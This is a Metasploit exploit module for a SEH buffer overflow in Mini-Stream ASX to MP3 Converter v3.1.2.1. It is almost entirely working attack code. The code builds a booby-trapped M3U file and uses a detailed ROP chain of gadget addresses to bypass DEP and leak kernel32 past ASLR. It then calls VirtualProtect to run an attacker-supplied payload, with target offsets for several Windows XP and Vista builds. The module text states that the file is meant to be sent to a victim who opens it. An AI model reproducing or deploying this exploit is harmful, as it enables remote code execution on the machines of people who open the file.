# Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit (Multiple OS, DEP and ASLR Bypass)
# Date: July 13, 2010
# Author: Node
# Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe
# Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation
# Tested on: Windows Vista Ultimate SP1 Eng
# Windows Vista Ultimate SP2 Eng
# Windows XP Pro SP3 Eng
# Windows XP Pro SP2 Swe
# Windows XP Pro SP3 Swe
# Windows XP Home SP3 Swe
# CVE :
# Notes: This is a proof of concept that ROP exploits can be made portable
# across operating-system versions by keeping every build-specific value
# in per-target variables. This exploit uses the following variables:
#
# 1. "Offset": The offset to the SEH overwrite
# 2. "Offset2": The offset before the ROP code starts in the buffer
# 3. "K32Offset": The offset to the kernel32 pointer on the stack
# 4. "VPOffset": The offset to VirtualProtect() from the grabbed
# kernel32 address
# 5. "ASLR": Activates or deactivates the ASLR bypassing ROP code
#
# K32Offset and VPOffset are stored as two's-complement negated values so
# that no null bytes appear in the file; the ROP chain restores them with
# a NEG EAX gadget. In the first target, K32Offset is 0xfffebcac, which
# NEG turns into 0x00014354 (82772): the number of bytes to subtract from
# the saved ESP to reach the kernel32 pointer left on the stack. VPOffset
# is the number of bytes to subtract from that kernel32 address to reach
# VirtualProtect(). If "ASLR" is false, "VPOffset" is instead used as the
# direct, non-negated address of VirtualProtect() in kernel32.dll.
# Code:
require 'msf/core'
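# Security notes for reviewers of this module:
#  * Every gadget address below is an absolute 0x100xxxxx value inside
#    MSA2Mfilter03.dll, so the chain requires that DLL to be mapped at its
#    fixed preferred base (the module itself is not randomised). The SEH
#    handler overwrite also points into it, so the DLL presumably is not
#    SafeSEH-protected either -- NOTE(review): confirm against the binary.
#  * The "ASLR bypass" is a stack leak: a kernel32 pointer is read from a
#    fixed distance (K32Offset) below the ESP captured by the chain, and
#    VirtualProtect() is then located at a fixed distance (VPOffset) from
#    it. Both distances are build-specific, which is why Vista SP1 and SP2
#    are separate targets, and the K32Offset is only valid for the exact
#    stack layout seen during SEH dispatch on that build.
#  * VirtualProtect() is called with flNewProtect = 0x40
#    (PAGE_EXECUTE_READWRITE) over dwSize = PAYLOAD_SPACE bytes starting at
#    the first byte of the encoded payload.
class Metasploit3 < Msf::Exploit::Remote
  # The chain depends on a fixed module base plus a stack leak, so
  # reliability varies with the exact OS / service-pack build.
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  # Maximum encoded payload size; also the dwSize passed to VirtualProtect()
  # and the size of the padded payload region at the end of the file.
  PAYLOAD_SPACE = 1000

  # NOP bytes placed between the SEH handler dword and the encoded payload.
  NOP_SLED = 24

  # Every shipped target keeps Offset - Offset2 at this value. The ROP chain
  # hard-codes the distance from its VirtualProtect() argument slot to the
  # payload (see PAYLOAD_DISTANCE), so a new target must preserve it; the
  # exploit method refuses to build a file otherwise.
  OFFSET_DELTA = 27172

  # Distance from the VirtualProtect() slot (the third dword of the chain,
  # i.e. Offset2 + 8) to the first payload byte (Offset + 4 + NOP_SLED).
  # Evaluates to 0x6a38 (27192) for the shipped targets, which is the value
  # the original chain carried as the negated constant 0xffff95c8.
  PAYLOAD_DISTANCE = OFFSET_DELTA + 4 + NOP_SLED - 8

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mini-Stream Software ASX to MP3 Converter v3.1.2.1 SEH Buffer Overflow.',
      'Description'    => %q{
This module exploits a SEH-based buffer overflow in ASX to MP3 Converter
v.3.1.2.1. An attacker must send the file to victim, and the victim must open
the specially crafted M3U file. This exploit is written with ROP gadgets from
MSA2Mfilter03.dll and bypasses DEP on all systems including ASLR on Vista.
},
      'License'        => MSF_LICENSE,
      'Author'         => [ 'Node' ],
      'Version'        => '$Revision: 99999 $',
      'Payload'        =>
        {
          'Space'    => PAYLOAD_SPACE,
          # 0x00 terminates the string, 0x0a/0x0d end the M3U line.
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform'       => 'win',
      # Per-target values (see the header):
      #   Offset    - distance to the SEH handler overwrite
      #   Offset2   - distance to the start of the ROP chain (the pivot
      #               gadget is ADD ESP,4404 # RETN, which lands here)
      #   K32Offset - negated distance from saved ESP to a kernel32 pointer
      #   VPOffset  - negated kernel32 -> VirtualProtect() distance when
      #               ASLR is true, absolute VirtualProtect() address otherwise
      # Vista SP1 and SP2 differ only in VPOffset (different kernel32 builds).
      'Targets'        =>
        [
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP1 Eng x86',
            {
              'Offset'    => 43511,
              'Offset2'   => 16339,
              'K32Offset' => 0xfffebcac,
              'VPOffset'  => 0xfffe4e9c,
              'ASLR'      => true
            } ],
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows Vista Ultimate SP2 Eng x86',
            {
              'Offset'    => 43511,
              'Offset2'   => 16339,
              'K32Offset' => 0xfffebcac,
              'VPOffset'  => 0xfffe5bf0,
              'ASLR'      => true
            } ],
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Eng x86',
            {
              'Offset'    => 43484,
              'Offset2'   => 16312,
              'VPOffset'  => 0x7c801ad4,
              'ASLR'      => false
            } ],
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP2 Swe x86',
            {
              'Offset'    => 43476,
              'Offset2'   => 16304,
              'VPOffset'  => 0x7c801ad0,
              'ASLR'      => false
            } ],
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Pro SP3 Swe x86',
            {
              'Offset'    => 43491,
              'Offset2'   => 16319,
              'VPOffset'  => 0x7c801ad4,
              'ASLR'      => false
            } ],
          [ 'ASX to MP3 Converter v3.1.2.1 on Windows XP Home SP3 Swe x86',
            {
              'Offset'    => 43476,
              'Offset2'   => 16304,
              'VPOffset'  => 0x7c801ad4,
              'ASLR'      => false
            } ]
        ],
      'Privileged'     => false,
      # Taken from the "Date" line of the module header.
      'DisclosureDate' => 'Jul 13 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'asx2mp3.m3u']),
      ], self.class)
  end

  # Builds the malicious M3U and hands it to the FILEFORMAT mixin.
  #
  # File layout (all sizes come from the selected target):
  #   [junk: Offset2 bytes][ROP chain][filler up to Offset][SEH handler]
  #   [NOP sled: NOP_SLED bytes][encoded payload][padding to PAYLOAD_SPACE]
  # The overwritten SEH handler is a stack pivot (ADD ESP,4404 # RETN) that
  # moves ESP onto the ROP chain, which is why the chain sits Offset2 bytes
  # into the file rather than directly after the handler.
  #
  # Raises ArgumentError when the target's Offset/Offset2 pair does not
  # match the distance the ROP chain hard-codes, or when the chain does not
  # fit between Offset2 and Offset.
  def exploit
    rop = build_rop_chain

    delta = target['Offset'] - target['Offset2']
    filler_len = delta - rop.length
    if delta != OFFSET_DELTA || filler_len < 0
      raise ArgumentError, "target Offset/Offset2 are inconsistent with the ROP chain (Offset - Offset2 must be #{OFFSET_DELTA})"
    end

    junk      = rand_text_alpha_upper(target['Offset2'])
    junktoseh = rand_text_alpha_upper(filler_len)
    seh       = dw(0x100177EA)          # ADD ESP,4404 # RETN  (stack pivot onto the chain)
    nops      = "\x90" * NOP_SLED
    # 'Space' caps payload.encoded at PAYLOAD_SPACE, so this is never negative.
    shellspace = rand_text_alpha_upper(PAYLOAD_SPACE - payload.encoded.length)

    m3ufile = junk + rop + junktoseh + seh + nops + payload.encoded + shellspace

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(m3ufile)
  end

  private

  # Packs an unsigned 32-bit value as a little-endian dword.
  def dw(value)
    [value].pack('V')
  end

  # Packs the two's-complement negation of +value+ as a little-endian dword.
  # Small positive constants (0x40, 1000, ...) would contain null bytes, so
  # the chain carries them negated and restores them with NEG EAX.
  def neg_dword(value)
    dw((-value) & 0xffffffff)
  end

  # Returns the DEP-bypass ROP chain for the selected target.
  #
  # The chain builds a VirtualProtect() call frame in its own first dwords,
  # fills the frame in by writing through EDX (which holds the address of
  # the frame), and finally pivots ESP onto the frame. Every gadget lives in
  # MSA2Mfilter03.dll at its fixed base. Several gadgets end in RETN 10 or
  # ADD ESP,n; the 'A' runs that follow them are the bytes those gadgets
  # skip and are never executed.
  #
  # When target['ASLR'] is true the kernel32 base is leaked from the stack
  # and VirtualProtect() computed from it; otherwise target['VPOffset'] is
  # used as the absolute VirtualProtect() address.
  def build_rop_chain
    rop = ''

    # -- 1. Capture ESP and lay out the VirtualProtect() frame ---------------
    # After the pivot's RETN, ESP points at the slot following this gadget;
    # PUSH ESP ... POP EBX captures that address in EBX. RETN 10 and
    # ADD ESP,20 then step over the frame placeholders.
    rop << dw(0x1002F7B7)  # PUSH ESP # AND AL,0C # NEG EDX # NEG EAX # SBB EDX,0 # POP EBX # RETN 10
    rop << dw(0x10023315)  # ADD ESP,20 # RETN
    rop << '1111'          # VirtualProtect() address   (patched in step 4)
    rop << '2222'          # return address -> payload  (patched in step 5)
    rop << '3333'          # lpAddress -> payload        (patched in step 5)
    rop << '4444'          # dwSize                      (patched in step 6)
    rop << '5555'          # flNewProtect                (patched in step 7)
    rop << dw(0x10066005)  # lpflOldProtect: writable address inside MSA2Mfilter03.dll
    rop << 'A' * 8
    rop << 'A' * 16        # skipped because of RETN 10

    # -- 2. EDX = captured ESP (address of the slot after gadget 1) ----------
    rop << dw(0x1002991C)  # XOR EDX,EDX # RETN
    rop << dw(0x10029F3E)  # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002FA6A)  # MOV EAX,EDX # RETN
    rop << 'A' * 16        # skipped because of RETN 10

    if target['ASLR']
      # -- 3. Leak a kernel32 pointer from the stack -------------------------
      # EAX = -K32Offset (82772 on the Vista targets), stashed in [EDX+4],
      # re-read into ECX, then EAX = [EDX - ECX] = kernel32 pointer found
      # K32Offset bytes below the captured ESP. The result is stored in the
      # VirtualProtect() slot for step 4. (MOV ECX,[EAX] executes before the
      # ADD BYTE PTR [EAX],AL side effect, and the slot is rewritten after.)
      rop << dw(0x1002A649)           # POP EAX # RETN
      rop << dw(target['K32Offset'])  # negated distance from saved ESP to the kernel32 pointer
      rop << dw(0x1005B5DB)           # NEG EAX # RETN
      rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
      rop << 'A' * 8
      rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
      rop << dw(0x100192DC)           # ADD EAX,4 # RETN
      rop << dw(0x100130C4)           # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN
      rop << 'A' * 8
      rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
      rop << dw(0x1002C86A)           # SUB EAX,ECX # RETN
      rop << dw(0x10027F59)           # MOV EAX,DWORD PTR DS:[EAX] # RETN
      rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
      rop << 'A' * 8
    end

    # -- 4. EDX += 4 (now the VirtualProtect() slot); resolve VirtualProtect --
    # EBX = -1, EAX = 0 + 4 + 1 = 5, EBX = 4, EDX += 4. ADD/INC gadgets are
    # used because a literal 4 would contain null bytes.
    rop << dw(0x100115AA)           # POP EBX # RETN
    rop << dw(0xffffffff)
    rop << dw(0x10014548)           # XOR EAX,EAX # RETN
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x1002D327)           # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
    rop << dw(0x10029F3E)           # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002A649)           # POP EAX # RETN
    rop << 'A' * 16                 # skipped because of RETN 10
    rop << dw(target['VPOffset'])   # ASLR: negated kernel32 -> VirtualProtect distance; else absolute address
    if target['ASLR']
      # EAX = -VPOffset, stashed in [EDX+4] and reloaded into ECX, then
      # EAX = [EDX] (leaked kernel32 pointer) - ECX = VirtualProtect().
      rop << dw(0x1005B5DB)         # NEG EAX # RETN
      rop << dw(0x100163CA)         # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
      rop << 'A' * 8
      rop << dw(0x1002FA6A)         # MOV EAX,EDX # RETN
      rop << dw(0x100192DC)         # ADD EAX,4 # RETN
      rop << dw(0x100130C4)         # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN
      rop << 'A' * 8
      rop << dw(0x1002FA6A)         # MOV EAX,EDX # RETN
      rop << dw(0x10027F59)         # MOV EAX,DWORD PTR DS:[EAX] # RETN
      rop << dw(0x1002C86A)         # SUB EAX,ECX # RETN
    end
    rop << dw(0x10019AA7)           # MOV DWORD PTR DS:[EDX],EAX # POP EDI # XOR EAX,EAX # POP EBP # ADD ESP,40 # RETN
    rop << 'A' * 8
    rop << 'A' * 64                 # skipped because of ADD ESP,40

    # -- 5. Return address and lpAddress = first payload byte ----------------
    # EAX = PAYLOAD_DISTANCE, stashed in [EDX+4], reloaded into ECX,
    # EAX = EDX + ECX, stored as the return address ([EDX+4]). Then EDX += 4
    # and the same value is copied into lpAddress (the new [EDX+4]).
    rop << dw(0x1002A649)           # POP EAX # RETN
    rop << neg_dword(PAYLOAD_DISTANCE)  # 0xffff95c8: negated payload offset
    rop << dw(0x1005B5DB)           # NEG EAX # RETN
    rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
    rop << 'A' * 8
    rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x100130C4)           # MOV ECX,DWORD PTR DS:[EAX] # ADD BYTE PTR DS:[EAX],AL # POP EBP # POP EBX # RETN
    rop << 'A' * 8
    rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
    rop << dw(0x1001451E)           # ADD EAX,ECX # RETN
    rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
    rop << 'A' * 8
    # EDX += 4 (EAX was zeroed by the store gadget above, so 0 + 4 + 1 = 5).
    rop << dw(0x100115AA)           # POP EBX # RETN
    rop << dw(0xffffffff)
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x1002D327)           # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
    rop << dw(0x10029F3E)           # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
    rop << 'A' * 16                 # skipped because of RETN 10
    rop << dw(0x10027F59)           # MOV EAX,DWORD PTR DS:[EAX] # RETN
    rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
    rop << 'A' * 8

    # -- 6. EDX += 4; dwSize = PAYLOAD_SPACE --------------------------------
    rop << dw(0x100115AA)           # POP EBX # RETN
    rop << dw(0xffffffff)
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x1002D327)           # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
    rop << dw(0x10029F3E)           # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002A649)           # POP EAX # RETN
    rop << 'A' * 16                 # skipped because of RETN 10
    rop << neg_dword(PAYLOAD_SPACE) # 0xfffffc18: 0x3e8 (1000) negated
    rop << dw(0x1005B5DB)           # NEG EAX # RETN
    rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
    rop << 'A' * 8

    # -- 7. EDX += 4; flNewProtect = 0x40 (PAGE_EXECUTE_READWRITE) ----------
    rop << dw(0x100115AA)           # POP EBX # RETN
    rop << dw(0xffffffff)
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x1002D327)           # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
    rop << dw(0x10029F3E)           # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002A649)           # POP EAX # RETN
    rop << 'A' * 16                 # skipped because of RETN 10
    rop << neg_dword(0x40)          # 0xffffffc0: 0x40 negated
    rop << dw(0x1005B5DB)           # NEG EAX # RETN
    rop << dw(0x100163CA)           # MOV DWORD PTR DS:[EDX+4],EAX # XOR EAX,EAX # ADD ESP,8 # RETN
    rop << 'A' * 8

    # -- 8. EDX -= 12 (back to the VirtualProtect() slot) and pivot ----------
    # EBX = -1, EAX = 4 + 4 + 1 + 1 + 1 = 11, NEG -> -11, EBX = -12, EDX -= 12.
    # XCHG EAX,ESP then makes the frame the stack and RETN calls VirtualProtect().
    rop << dw(0x100115AA)           # POP EBX # RETN
    rop << dw(0xffffffff)
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x100192DC)           # ADD EAX,4 # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x10016C87)           # INC EAX # RETN
    rop << dw(0x1005B5DB)           # NEG EAX # RETN
    rop << dw(0x1002D327)           # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # RETN
    rop << dw(0x10029F3E)           # ADD EDX,EBX # POP EBX # RETN 10
    rop << 'A' * 4
    rop << dw(0x1002FA6A)           # MOV EAX,EDX # RETN
    rop << 'A' * 16                 # skipped because of RETN 10
    rop << dw(0x1002FE81)           # XCHG EAX,ESP # RETN

    rop
  end
end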